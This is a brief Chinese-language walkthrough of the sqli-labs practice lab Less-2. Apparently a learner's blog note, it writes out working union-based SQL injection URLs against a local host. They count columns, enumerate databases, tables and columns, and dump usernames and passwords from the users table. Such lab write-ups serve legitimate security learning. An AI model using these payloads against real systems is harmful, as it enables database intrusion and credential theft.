Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
一上来一顿单引号,双引号,单括号,双括号or and测试,都不行,拿sqlmap跑一下子
唉,大意了不是,最简单的数字型注入,开整
http://192.168.1.21/sqli-labs-master/Less-2/?id=1 order by 3--+
正常显示,列查询3,接着暴库,这题我就不上这么多图了,偷懒!!!
http://192.168.1.21/sqli-labs-master/Less-2/?id=-1 union select 1,database(),3--+
数据库名:security
查看所有数据库名
http://192.168.1.21/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata--+
有图有真相
暴表名
http://192.168.1.21/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
老套路,表users,爆列名
http://192.168.1.21/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
列username,password应该是爆破点
http://192.168.1.21/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(username,0x7e,password),3 from security.users--+
一排显不了,不自动换行,这个问题懒得研究了,只是截图不好看,呵呵!
今天先到这里,少就是多,慢就是快,一题一题的弄明白!